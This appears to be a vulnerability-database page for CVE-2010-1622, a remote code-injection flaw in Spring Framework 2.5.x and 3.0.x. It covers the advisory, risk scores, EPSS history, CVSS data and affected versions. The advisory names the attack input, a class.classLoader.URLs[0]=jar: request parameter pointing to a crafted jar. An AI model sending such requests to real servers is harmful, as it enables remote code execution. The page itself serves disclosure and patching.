GHSA-vpr3-f594-mg5g · Severity: medium · Ecosystem: maven — Improper Control of Generation of Code ('Code Injection') in Spring Framework
SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.
Conclusion & alert: CVE-2010-1622 is rated High Exploit Risk (67.6/100): CVSS Medium severity, with medium exploitation likelihood (EPSS 1.55%). Core evidence: 4 public exploit reference(s) are indexed (Exploit-DB). Mandatory action: Public exploits are available—assess exposure, apply mitigations, and prioritize patching.
Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.
| EDB-ID | Source | Kind | Published | Link |
|---|---|---|---|---|
| 13918 | exploit_db | edb | 2010-06-18 | Exploit-DB ↗ |
| — | nvd_ref | exploit_tag | Exploit-DB ↗ | |
| — | nvd_ref | exploit_tag | Exploit-DB ↗ | |
| — | nvd_ref | exploit_tag | Exploit-DB ↗ |
EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).
| # | Date | Old EPSS score | New EPSS score | Delta (New - Old) |
|---|---|---|---|---|
| 1 | 2026-05-22 | 1.52% | 1.55% | +0.03% |
| 2 | 2026-05-15 | 1.56% | 1.52% | -0.04% |
| 3 | 2026-05-06 | — | 1.56% | — |
Full EPSS history (61 records total)
CVSS metrics for this CVE.
| Base score | Version | Severity | Vector | Exploitability | Impact | Score source |
|---|---|---|---|---|---|---|
| 6.0 | 2.0 | MEDIUM |
|
6.8 | 6.4 | [email protected] |
GHSA-vpr3-f594-mg5g · Severity: medium · Ecosystem: maven — Improper Control of Generation of Code ('Code Injection') in Spring Framework
| vendor | priority | summary | link |
|---|---|---|---|
redhat
|
high | — | https://access.redhat.com/security/cve/CVE-2010-1622 |
: The previous CVSS assessment 5.1 (AV:N/AC:M/Au:N/C:P/I:P/A:P) was provided at the time of initial analysis based on the best available published information at that time. The score has be updated to reflect the impact to Oracle products per <a href=http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html> Oracle Critical Patch Update Advisory - October 2015 </a>. Other products listed as vulnerable may or may not be similarly impacted.
| Vendor | Product | Version | Raw CPE |
|---|---|---|---|
| oracle | fusion_middleware | 7.6.2 | cpe:2.3:a:oracle:fusion_middleware:7.6.2:*:*:*:*:*:*:* |
| oracle | fusion_middleware | 11.1.1.6.1 | cpe:2.3:a:oracle:fusion_middleware:11.1.1.6.1:*:*:*:*:*:*:* |
| oracle | fusion_middleware | 11.1.1.8.0 | cpe:2.3:a:oracle:fusion_middleware:11.1.1.8.0:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.0 | cpe:2.3:a:springsource:spring_framework:2.5.0:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.1 | cpe:2.3:a:springsource:spring_framework:2.5.1:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.2 | cpe:2.3:a:springsource:spring_framework:2.5.2:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.3 | cpe:2.3:a:springsource:spring_framework:2.5.3:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.4 | cpe:2.3:a:springsource:spring_framework:2.5.4:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.5 | cpe:2.3:a:springsource:spring_framework:2.5.5:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.6 | cpe:2.3:a:springsource:spring_framework:2.5.6:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.7 | cpe:2.3:a:springsource:spring_framework:2.5.7:*:*:*:*:*:*:* |
| springsource | spring_framework | 3.0.0 | cpe:2.3:a:springsource:spring_framework:3.0.0:*:*:*:*:*:*:* |
| springsource | spring_framework | 3.0.1 | cpe:2.3:a:springsource:spring_framework:3.0.1:*:*:*:*:*:*:* |
| springsource | spring_framework | 3.0.2 | cpe:2.3:a:springsource:spring_framework:3.0.2:*:*:*:*:*:*:* |